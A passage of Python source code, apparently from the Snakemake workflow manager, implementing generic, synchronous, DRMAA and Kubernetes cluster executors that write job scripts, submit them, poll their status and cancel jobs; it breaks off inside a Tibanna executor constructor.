return os.path.abspath(self._tmpdir)
def get_jobscript(self, job):
f = job.format_wildcards(self.jobname, cluster=self.cluster_wildcards(job))
if os.path.sep in f:
raise WorkflowError(
"Path separator ({}) found in job name {}. "
"This is not supported.".format(os.path.sep, f)
)
return os.path.join(self.tmpdir, f)
def format_job(self, pattern, job, **kwargs):
wait_for_files = []
scheduler_solver_path = ""
if self.assume_shared_fs:
wait_for_files.append(self.tmpdir)
wait_for_files.extend(job.get_wait_for_files())
# Prepend PATH of current python executable to PATH.
# This way, we ensure that the snakemake process in the cluster node runs
# in the same environment as the current process.
# This is necessary in order to find the pulp solver backends (e.g. coincbc).
scheduler_solver_path = "--scheduler-solver-path {}".format(
os.path.dirname(sys.executable)
)
# Only create extra file if we have more than 20 input files.
# This should not require the file creation in most cases.
if len(wait_for_files) > 20:
wait_for_files_file = self.get_jobscript(job) + ".waitforfilesfile.txt"
with open(wait_for_files_file, "w") as fd:
fd.write("\n".join(wait_for_files))
waitfiles_parameter = format(
"--wait-for-files-file {wait_for_files_file}",
wait_for_files_file=repr(wait_for_files_file),
)
else:
waitfiles_parameter = format(
"--wait-for-files {wait_for_files}",
wait_for_files=[repr(f) for f in wait_for_files],
)
job_specific_args = ""
if job.is_group:
job_specific_args = f"--local-groupid {job.jobid}"
format_p = partial(
self.format_job_pattern,
job=job,
properties=job.properties(cluster=self.cluster_params(job)),
latency_wait=self.latency_wait,
waitfiles_parameter=waitfiles_parameter,
scheduler_solver_path=scheduler_solver_path,
job_specific_args=job_specific_args,
**kwargs,
)
try:
return format_p(pattern)
except KeyError as e:
raise WorkflowError(
"Error formatting jobscript: {} not found\n"
"Make sure that your custom jobscript is up to date.".format(e)
)
def write_jobscript(self, job, jobscript, **kwargs):
# only force threads if this is not a group job
# otherwise we want proper process handling
use_threads = "--force-use-threads" if not job.is_group() else ""
envvars = " ".join(
"{}={}".format(var, os.environ[var]) for var in self.workflow.envvars
)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads=use_threads,
envvars=envvars,
**kwargs,
)
content = self.format_job(self.jobscript, job, exec_job=exec_job, **kwargs)
logger.debug("Jobscript:\n{}".format(content))
with open(jobscript, "w") as f:
print(content, file=f)
os.chmod(jobscript, os.stat(jobscript).st_mode | stat.S_IXUSR | stat.S_IRUSR)
def cluster_params(self, job):
"""Return wildcards object for job from cluster_config."""
cluster = self.cluster_config.get("__default__", dict()).copy()
cluster.update(self.cluster_config.get(job.name, dict()))
# Format values with available parameters from the job.
for key, value in list(cluster.items()):
if isinstance(value, str):
try:
cluster[key] = job.format_wildcards(value)
except NameError as e:
if job.is_group():
msg = (
"Failed to format cluster config for group job. "
"You have to ensure that your default entry "
"does not contain any items that group jobs "
"cannot provide, like {rule}, {wildcards}."
)
else:
msg = (
"Failed to format cluster config "
"entry for job {}.".format(job.rule.name)
)
raise WorkflowError(msg, e)
return cluster
def cluster_wildcards(self, job):
return Wildcards(fromdict=self.cluster_params(job))
def handle_job_success(self, job):
super().handle_job_success(
job, upload_remote=False, handle_log=False, handle_touch=False
)
def handle_job_error(self, job):
# TODO what about removing empty remote dirs?? This cannot be decided
# on the cluster node.
super().handle_job_error(job, upload_remote=False)
logger.debug("Cleanup job metadata.")
# We have to remove metadata here as well.
# It will be removed by the CPUExecutor in case of a shared FS,
# but we might not see the removal due to filesystem latency.
# By removing it again, we make sure that it is gone on the host FS.
if not self.keepincomplete:
self.workflow.persistence.cleanup(job)
# Also cleanup the jobs output files, in case the remote job
# was not able to, due to e.g. timeout.
logger.debug("Cleanup failed jobs output files.")
job.cleanup()
def print_cluster_job_error(self, job_info, jobid):
job = job_info.job
kind = (
"rule {}".format(job.rule.name)
if not job.is_group()
else "group job {}".format(job.groupid)
)
logger.error(
"Error executing {} on cluster (jobid: {}, external: "
"{}, jobscript: {}). For error details see the cluster "
"log and the log files of the involved rule(s).".format(
kind, jobid, job_info.jobid, job_info.jobscript
)
)
GenericClusterJob = namedtuple(
"GenericClusterJob",
"job jobid callback error_callback jobscript jobfinished jobfailed",
)
class GenericClusterExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
statuscmd=None,
cancelcmd=None,
cancelnargs=None,
sidecarcmd=None,
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
self.submitcmd = submitcmd
if not assume_shared_fs and statuscmd is None:
raise WorkflowError(
"When no shared filesystem can be assumed, a "
"status command must be given."
)
self.statuscmd = statuscmd
self.cancelcmd = cancelcmd
self.sidecarcmd = sidecarcmd
self.cancelnargs = cancelnargs
self.external_jobid = dict()
# We need to collect all external ids so we can properly cancel even if
# the status update queue is running.
self.all_ext_jobids = list()
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.sidecar_vars = None
if self.sidecarcmd:
self._launch_sidecar()
if statuscmd:
self.exec_job += " && exit 0 || exit 1"
elif assume_shared_fs:
# TODO wrap with watch and touch {jobrunning}
# check modification date of {jobrunning} in the wait_for_job method
self.exec_job += " && touch {jobfinished} || (touch {jobfailed}; exit 1)"
else:
raise WorkflowError(
"If no shared filesystem is used, you have to "
"specify a cluster status command."
)
def _launch_sidecar(self):
def copy_stdout(executor, process):
"""Run sidecar process and copy it's stdout to our stdout."""
while process.poll() is None and executor.wait:
buf = process.stdout.readline()
if buf:
self.stdout.write(buf)
# one final time ...
buf = process.stdout.readline()
if buf:
self.stdout.write(buf)
def wait(executor, process):
while executor.wait:
time.sleep(0.5)
process.terminate()
process.wait()
logger.info(
"Cluster sidecar process has terminated (retcode=%d)."
% process.returncode
)
logger.info("Launch sidecar process and read first output line.")
process = subprocess.Popen(
self.sidecarcmd, stdout=subprocess.PIPE, shell=False, encoding="utf-8"
)
self.sidecar_vars = process.stdout.readline()
while self.sidecar_vars and self.sidecar_vars[-1] in "\n\r":
self.sidecar_vars = self.sidecar_vars[:-1]
logger.info("Done reading first output line.")
thread_stdout = threading.Thread(
target=copy_stdout, name="sidecar_stdout", args=(self, process)
)
thread_stdout.start()
thread_wait = threading.Thread(
target=wait, name="sidecar_stdout", args=(self, process)
)
thread_wait.start()
def cancel(self):
def _chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i : i + n]
if self.cancelcmd: # We have --cluster-cancel
# Enumerate job IDs and create chunks. If cancelnargs evaluates to false (0/None)
# then pass all job ids at once
jobids = list(self.all_ext_jobids)
chunks = list(_chunks(jobids, self.cancelnargs or len(jobids)))
# Go through the chunks and cancel the jobs, warn in case of failures.
failures = 0
for chunk in chunks:
try:
cancel_timeout = 2 # rather fail on timeout than miss canceling all
env = dict(os.environ)
if self.sidecar_vars:
env["SNAKEMAKE_CLUSTER_SIDECAR_VARS"] = self.sidecar_vars
subprocess.check_call(
[self.cancelcmd] + chunk,
shell=False,
timeout=cancel_timeout,
env=env,
)
except subprocess.SubprocessError:
failures += 1
if failures:
logger.info(
(
"{} out of {} calls to --cluster-cancel failed. This is safe to "
"ignore in most cases."
).format(failures, len(chunks))
)
else:
logger.info(
"No --cluster-cancel given. Will exit after finishing currently running jobs."
)
self.shutdown()
def register_job(self, job):
# Do not register job here.
# Instead do it manually once the jobid is known.
pass
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
jobfinished = os.path.join(self.tmpdir, "{}.jobfinished".format(jobid))
jobfailed = os.path.join(self.tmpdir, "{}.jobfailed".format(jobid))
self.write_jobscript(
job, jobscript, jobfinished=jobfinished, jobfailed=jobfailed
)
if self.statuscmd:
ext_jobid = self.dag.incomplete_external_jobid(job)
if ext_jobid:
# Job is incomplete and still running.
# We simply register it and wait for completion or failure.
logger.info(
"Resuming incomplete job {} with external jobid '{}'.".format(
jobid, ext_jobid
)
)
submit_callback(job)
with self.lock:
self.all_ext_jobids.append(ext_jobid)
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
return
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
try:
env = dict(os.environ)
if self.sidecar_vars:
env["SNAKEMAKE_CLUSTER_SIDECAR_VARS"] = self.sidecar_vars
# Remove SNAKEMAKE_PROFILE from environment as the snakemake call inside
# of the cluster job must run locally (or complains about missing -j).
env.pop("SNAKEMAKE_PROFILE", None)
ext_jobid = (
subprocess.check_output(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
env=env,
)
.decode()
.split("\n")
)
except subprocess.CalledProcessError as ex:
logger.error(
"Error submitting jobscript (exit code {}):\n{}".format(
ex.returncode, ex.output.decode()
)
)
error_callback(job)
return
if ext_jobid and ext_jobid[0]:
ext_jobid = ext_jobid[0]
self.external_jobid.update((f, ext_jobid) for f in job.output)
logger.info(
"Submitted {} {} with external jobid '{}'.".format(
"group job" if job.is_group() else "job", jobid, ext_jobid
)
)
self.workflow.persistence.started(job, external_jobid=ext_jobid)
submit_callback(job)
with self.lock:
self.all_ext_jobids.append(ext_jobid)
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
def _wait_for_jobs(self):
success = "success"
failed = "failed"
running = "running"
status_cmd_kills = []
if self.statuscmd is not None:
def job_status(job, valid_returns=["running", "success", "failed"]):
try:
# this command shall return "success", "failed" or "running"
env = dict(os.environ)
if self.sidecar_vars:
env["SNAKEMAKE_CLUSTER_SIDECAR_VARS"] = self.sidecar_vars
ret = subprocess.check_output(
"{statuscmd} {jobid}".format(
jobid=job.jobid, statuscmd=self.statuscmd
),
shell=True,
env=env,
).decode()
except subprocess.CalledProcessError as e:
if e.returncode < 0:
# Ignore SIGINT and all other issues due to signals
# because it will be caused by hitting e.g.
# Ctrl-C on the main process or sending killall to
# snakemake.
# Snakemake will handle the signal in
# the main process.
status_cmd_kills.append(-e.returncode)
if len(status_cmd_kills) > 10:
logger.info(
"Cluster status command {} was killed >10 times with signal(s) {} "
"(if this happens unexpectedly during your workflow execution, "
"have a closer look.).".format(
self.statuscmd, ",".join(status_cmd_kills)
)
)
status_cmd_kills.clear()
else:
raise WorkflowError(
"Failed to obtain job status. "
"See above for error message."
)
ret = ret.strip().split("\n")
if len(ret) != 1 or ret[0] not in valid_returns:
raise WorkflowError(
"Cluster status command {} returned {} but just a single line with one of {} is expected.".format(
self.statuscmd, "\\n".join(ret), ",".join(valid_returns)
)
)
return ret[0]
else:
def job_status(job):
if os.path.exists(active_job.jobfinished):
os.remove(active_job.jobfinished)
os.remove(active_job.jobscript)
return success
if os.path.exists(active_job.jobfailed):
os.remove(active_job.jobfailed)
os.remove(active_job.jobscript)
return failed
return running
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
# logger.debug("Checking status of {} jobs.".format(len(active_jobs)))
for active_job in active_jobs:
with self.status_rate_limiter:
status = job_status(active_job)
if status == success:
active_job.callback(active_job.job)
elif status == failed:
self.print_job_error(
active_job.job,
cluster_jobid=active_job.jobid
if active_job.jobid
else "unknown",
)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
else:
still_running.append(active_job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
SynchronousClusterJob = namedtuple(
"SynchronousClusterJob", "job jobid callback error_callback jobscript process"
)
class SynchronousClusterExecutor(ClusterExecutor):
"""
invocations like "qsub -sync y" (SGE) or "bsub -K" (LSF) are
synchronous, blocking the foreground thread and returning the
remote exit code at remote exit.
"""
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
restart_times=0,
assume_shared_fs=True,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=10,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.submitcmd = submitcmd
self.external_jobid = dict()
def cancel(self):
logger.info("Will exit after finishing currently running jobs.")
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
process = subprocess.Popen(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
)
submit_callback(job)
with self.lock:
self.active_jobs.append(
SynchronousClusterJob(
job, process.pid, callback, error_callback, jobscript, process
)
)
def _wait_for_jobs(self):
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
exitcode = active_job.process.poll()
if exitcode is None:
# job not yet finished
still_running.append(active_job)
elif exitcode == 0:
# job finished successfully
os.remove(active_job.jobscript)
active_job.callback(active_job.job)
else:
# job failed
os.remove(active_job.jobscript)
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
DRMAAClusterJob = namedtuple(
"DRMAAClusterJob", "job jobid callback error_callback jobscript"
)
class DRMAAExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
drmaa_args="",
drmaa_log_dir=None,
latency_wait=3,
cluster_config=None,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
try:
import drmaa
except ImportError:
raise WorkflowError(
"Python support for DRMAA is not installed. "
"Please install it, e.g. with easy_install3 --user drmaa"
)
except RuntimeError as e:
raise WorkflowError("Error loading drmaa support:\n{}".format(e))
self.session = drmaa.Session()
self.drmaa_args = drmaa_args
self.drmaa_log_dir = drmaa_log_dir
self.session.initialize()
self.submitted = list()
def cancel(self):
from drmaa.const import JobControlAction
from drmaa.errors import InvalidJobException, InternalException
for jobid in self.submitted:
try:
self.session.control(jobid, JobControlAction.TERMINATE)
except (InvalidJobException, InternalException):
# This is common - logging a warning would probably confuse the user.
pass
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
try:
drmaa_args = job.format_wildcards(
self.drmaa_args, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule)
import drmaa
if self.drmaa_log_dir:
makedirs(self.drmaa_log_dir)
try:
jt = self.session.createJobTemplate()
jt.remoteCommand = jobscript
jt.nativeSpecification = drmaa_args
if self.drmaa_log_dir:
jt.outputPath = ":" + self.drmaa_log_dir
jt.errorPath = ":" + self.drmaa_log_dir
jt.jobName = os.path.basename(jobscript)
jobid = self.session.runJob(jt)
except (
drmaa.DeniedByDrmException,
drmaa.InternalException,
drmaa.InvalidAttributeValueException,
) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)), self.workflow.linemaps
)
error_callback(job)
return
logger.info(
"Submitted DRMAA job {} with external jobid {}.".format(job.jobid, jobid)
)
self.submitted.append(jobid)
self.session.deleteJobTemplate(jt)
submit_callback(job)
with self.lock:
self.active_jobs.append(
DRMAAClusterJob(job, jobid, callback, error_callback, jobscript)
)
def shutdown(self):
super().shutdown()
self.session.exit()
def _wait_for_jobs(self):
import drmaa
suspended_msg = set()
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
try:
retval = self.session.jobStatus(active_job.jobid)
except drmaa.ExitTimeoutException as e:
# job still active
still_running.append(active_job)
continue
except (drmaa.InternalException, Exception) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)),
self.workflow.linemaps,
)
os.remove(active_job.jobscript)
active_job.error_callback(active_job.job)
continue
if retval == drmaa.JobState.DONE:
os.remove(active_job.jobscript)
active_job.callback(active_job.job)
elif retval == drmaa.JobState.FAILED:
os.remove(active_job.jobscript)
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
else:
# still running
still_running.append(active_job)
def handle_suspended(by):
if active_job.job.jobid not in suspended_msg:
logger.warning(
"Job {} (DRMAA id: {}) was suspended by {}.".format(
active_job.job.jobid, active_job.jobid, by
)
)
suspended_msg.add(active_job.job.jobid)
if retval == drmaa.JobState.USER_SUSPENDED:
handle_suspended("user")
elif retval == drmaa.JobState.SYSTEM_SUSPENDED:
handle_suspended("system")
else:
try:
suspended_msg.remove(active_job.job.jobid)
except KeyError:
# there was nothing to remove
pass
with self.lock:
self.active_jobs.extend(still_running)
sleep()
@contextlib.contextmanager
def change_working_directory(directory=None):
"""Change working directory in execution context if provided."""
if directory:
try:
saved_directory = os.getcwd()
logger.info("Changing to shadow directory: {}".format(directory))
os.chdir(directory)
yield
finally:
os.chdir(saved_directory)
else:
yield
KubernetesJob = namedtuple(
"KubernetesJob", "job jobid callback error_callback kubejob jobscript"
)
class KubernetesExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
namespace,
container_image=None,
jobname="{rulename}.{jobid}",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
cluster_config=None,
local_input=None,
restart_times=None,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
exec_job = (
"cp -rf /source/. . && "
"snakemake {target} --snakefile {snakefile} "
"--force --cores {cores} --keep-target-files --keep-remote "
"--latency-wait {latency_wait} --scheduler {workflow.scheduler_type} "
" --attempt {attempt} {use_threads} --max-inventory-time 0 "
"--wrapper-prefix {workflow.wrapper_prefix} "
"{overwrite_config} {printshellcmds} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
super().__init__(
workflow,
dag,
None,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=10,
)
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
try:
from kubernetes import config
except ImportError:
raise WorkflowError(
"The Python 3 package 'kubernetes' "
"must be installed to use Kubernetes"
)
config.load_kube_config()
import kubernetes.client
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
self.namespace = namespace
self.envvars = workflow.envvars
self.secret_files = {}
self.run_namespace = str(uuid.uuid4())
self.secret_envvars = {}
self.register_secret()
self.container_image = container_image or get_container_image()
logger.info(f"Using {self.container_image} for Kubernetes jobs.")
def register_secret(self):
import kubernetes.client
secret = kubernetes.client.V1Secret()
secret.metadata = kubernetes.client.V1ObjectMeta()
# create a random uuid
secret.metadata.name = self.run_namespace
secret.type = "Opaque"
secret.data = {}
for i, f in enumerate(self.workflow.get_sources()):
if f.startswith(".."):
logger.warning(
"Ignoring source file {}. Only files relative "
"to the working directory are allowed.".format(f)
)
continue
# The kubernetes API can't create secret files larger than 1MB.
source_file_size = os.path.getsize(f)
max_file_size = 1048576
if source_file_size > max_file_size:
logger.warning(
"Skipping the source file {f}. Its size {source_file_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f, source_file_size=source_file_size
)
)
continue
with open(f, "br") as content:
key = "f{}".format(i)
# Some files are smaller than 1MB, but grows larger after being base64 encoded
# We should exclude them as well, otherwise Kubernetes APIs will complain
encoded_contents = base64.b64encode(content.read()).decode()
encoded_size = len(encoded_contents)
if encoded_size > 1048576:
logger.warning(
"Skipping the source file {f} for secret key {key}. "
"Its base64 encoded size {encoded_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f,
source_file_size=source_file_size,
key=key,
encoded_size=encoded_size,
)
)
continue
self.secret_files[key] = f
secret.data[key] = encoded_contents
for e in self.envvars:
try:
key = e.lower()
secret.data[key] = base64.b64encode(os.environ[e].encode()).decode()
self.secret_envvars[key] = e
except KeyError:
continue
# Test if the total size of the configMap exceeds 1MB
config_map_size = sum(
[len(base64.b64decode(v)) for k, v in secret.data.items()]
)
if config_map_size > 1048576:
logger.warning(
"The total size of the included files and other Kubernetes secrets "
"is {}, exceeding the 1MB limit.\n".format(config_map_size)
)
logger.warning(
"The following are the largest files. Consider removing some of them "
"(you need remove at least {} bytes):".format(config_map_size - 1048576)
)
entry_sizes = {
self.secret_files[k]: len(base64.b64decode(v))
for k, v in secret.data.items()
if k in self.secret_files
}
for k, v in sorted(entry_sizes.items(), key=lambda item: item[1])[:-6:-1]:
logger.warning(" * File: {k}, original size: {v}".format(k=k, v=v))
raise WorkflowError("ConfigMap too large")
self.kubeapi.create_namespaced_secret(self.namespace, secret)
def unregister_secret(self):
import kubernetes.client
safe_delete_secret = lambda: self.kubeapi.delete_namespaced_secret(
self.run_namespace, self.namespace, body=kubernetes.client.V1DeleteOptions()
)
self._kubernetes_retry(safe_delete_secret)
# In rare cases, deleting a pod may rais 404 NotFound error.
def safe_delete_pod(self, jobid, ignore_not_found=True):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
try:
self.kubeapi.delete_namespaced_pod(jobid, self.namespace, body=body)
except kubernetes.client.rest.ApiException as e:
if e.status == 404 and ignore_not_found:
# Can't find the pod. Maybe it's already been
# destroyed. Proceed with a warning message.
logger.warning(
"[WARNING] 404 not found when trying to delete the pod: {jobid}\n"
"[WARNING] Ignore this error\n".format(jobid=jobid)
)
else:
raise e
def shutdown(self):
self.unregister_secret()
super().shutdown()
def cancel(self):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
with self.lock:
for j in self.active_jobs:
func = lambda: self.safe_delete_pod(j.jobid, ignore_not_found=True)
self._kubernetes_retry(func)
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
import kubernetes.client
super()._run(job)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads="--force-use-threads" if not job.is_group() else "",
)
# Kubernetes silently does not submit a job if the name is too long
# therefore, we ensure that it is not longer than snakejob+uuid.
jobid = "snakejob-{}".format(
get_uuid("{}-{}-{}".format(self.run_namespace, job.jobid, job.attempt))
)
body = kubernetes.client.V1Pod()
body.metadata = kubernetes.client.V1ObjectMeta(labels={"app": "snakemake"})
body.metadata.name = jobid
# container
container = kubernetes.client.V1Container(name=jobid)
container.image = self.container_image
container.command = shlex.split("/bin/sh")
container.args = ["-c", exec_job]
container.working_dir = "/workdir"
container.volume_mounts = [
kubernetes.client.V1VolumeMount(name="workdir", mount_path="/workdir")
]
container.volume_mounts = [
kubernetes.client.V1VolumeMount(name="source", mount_path="/source")
]
body.spec = kubernetes.client.V1PodSpec(containers=[container])
# fail on first error
body.spec.restart_policy = "Never"
# source files as a secret volume
# we copy these files to the workdir before executing Snakemake
too_large = [
path
for path in self.secret_files.values()
if os.path.getsize(path) > 1000000
]
if too_large:
raise WorkflowError(
"The following source files exceed the maximum "
"file size (1MB) that can be passed from host to "
"kubernetes. These are likely not source code "
"files. Consider adding them to your "
"remote storage instead or (if software) use "
"Conda packages or container images:\n{}".format("\n".join(too_large))
)
secret_volume = kubernetes.client.V1Volume(name="source")
secret_volume.secret = kubernetes.client.V1SecretVolumeSource()
secret_volume.secret.secret_name = self.run_namespace
secret_volume.secret.items = [
kubernetes.client.V1KeyToPath(key=key, path=path)
for key, path in self.secret_files.items()
]
# workdir as an emptyDir volume of undefined size
workdir_volume = kubernetes.client.V1Volume(name="workdir")
workdir_volume.empty_dir = kubernetes.client.V1EmptyDirVolumeSource()
body.spec.volumes = [secret_volume, workdir_volume]
# env vars
container.env = []
for key, e in self.secret_envvars.items():
envvar = kubernetes.client.V1EnvVar(name=e)
envvar.value_from = kubernetes.client.V1EnvVarSource()
envvar.value_from.secret_key_ref = kubernetes.client.V1SecretKeySelector(
key=key, name=self.run_namespace
)
container.env.append(envvar)
# request resources
container.resources = kubernetes.client.V1ResourceRequirements()
container.resources.requests = {}
container.resources.requests["cpu"] = job.resources["_cores"]
if "mem_mb" in job.resources.keys():
container.resources.requests["memory"] = "{}M".format(
job.resources["mem_mb"]
)
# capabilities
if job.needs_singularity and self.workflow.use_singularity:
# TODO this should work, but it doesn't currently because of
# missing loop devices
# singularity inside docker requires SYS_ADMIN capabilities
# see https://groups.google.com/a/lbl.gov/forum/#!topic/singularity/e9mlDuzKowc
# container.capabilities = kubernetes.client.V1Capabilities()
# container.capabilities.add = ["SYS_ADMIN",
# "DAC_OVERRIDE",
# "SETUID",
# "SETGID",
# "SYS_CHROOT"]
# Running in priviledged mode always works
container.security_context = kubernetes.client.V1SecurityContext(
privileged=True
)
pod = self._kubernetes_retry(
lambda: self.kubeapi.create_namespaced_pod(self.namespace, body)
)
logger.info(
"Get status with:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}".format(jobid=jobid)
)
self.active_jobs.append(
KubernetesJob(job, jobid, callback, error_callback, pod, None)
)
# Sometimes, certain k8s requests throw kubernetes.client.rest.ApiException
# Solving this issue requires reauthentication, as _kubernetes_retry shows
# However, reauthentication itself, under rare conditions, may also throw
# errors such as:
# kubernetes.client.exceptions.ApiException: (409), Reason: Conflict
#
# This error doesn't mean anything wrong with the k8s cluster, and users can safely
# ignore it.
def _reauthenticate_and_retry(self, func=None):
import kubernetes
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
logger.info("Trying to reauthenticate")
kubernetes.config.load_kube_config()
subprocess.run(["kubectl", "get", "nodes"])
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
try:
self.register_secret()
except kubernetes.client.rest.ApiException as e:
if e.status == 409 and e.reason == "Conflict":
logger.warning("409 conflict ApiException when registering secrets")
logger.warning(e)
else:
raise WorkflowError(
e,
"This is likely a bug in "
"https://github.com/kubernetes-client/python.",
)
if func:
return func()
def _kubernetes_retry(self, func):
import kubernetes
import urllib3
with self.lock:
try:
return func()
except kubernetes.client.rest.ApiException as e:
if e.status == 401:
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
return self._reauthenticate_and_retry(func)
# Handling timeout that may occur in case of GKE master upgrade
except urllib3.exceptions.MaxRetryError as e:
logger.info(
"Request time out! "
"check your connection to Kubernetes master"
"Workflow will pause for 5 minutes to allow any update operations to complete"
)
time.sleep(300)
try:
return func()
except:
# Still can't reach the server after 5 minutes
raise WorkflowError(
e,
"Error 111 connection timeout, please check"
" that the k8 cluster master is reachable!",
)
def _wait_for_jobs(self):
import kubernetes
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
with self.status_rate_limiter:
logger.debug("Checking status for pod {}".format(j.jobid))
job_not_found = False
try:
res = self._kubernetes_retry(
lambda: self.kubeapi.read_namespaced_pod_status(
j.jobid, self.namespace
)
)
except kubernetes.client.rest.ApiException as e:
if e.status == 404:
# Jobid not found
# The job is likely already done and was deleted on
# the server.
j.callback(j.job)
continue
except WorkflowError as e:
print_exception(e, self.workflow.linemaps)
j.error_callback(j.job)
continue
if res is None:
msg = (
"Unknown pod {jobid}. "
"Has the pod been deleted "
"manually?"
).format(jobid=j.jobid)
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Failed":
msg = (
"For details, please issue:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}"
).format(jobid=j.jobid)
# failed
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Succeeded":
# finished
j.callback(j.job)
func = lambda: self.safe_delete_pod(
j.jobid, ignore_not_found=True
)
self._kubernetes_retry(func)
else:
# still active
still_running.append(j)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
TibannaJob = namedtuple(
"TibannaJob", "job jobname jobid exec_arn callback error_callback"
)
class TibannaExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
tibanna_sfn,
precommand="",
tibanna_config=False,
container_image=None,
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
local_input=None,
restart_times=None,
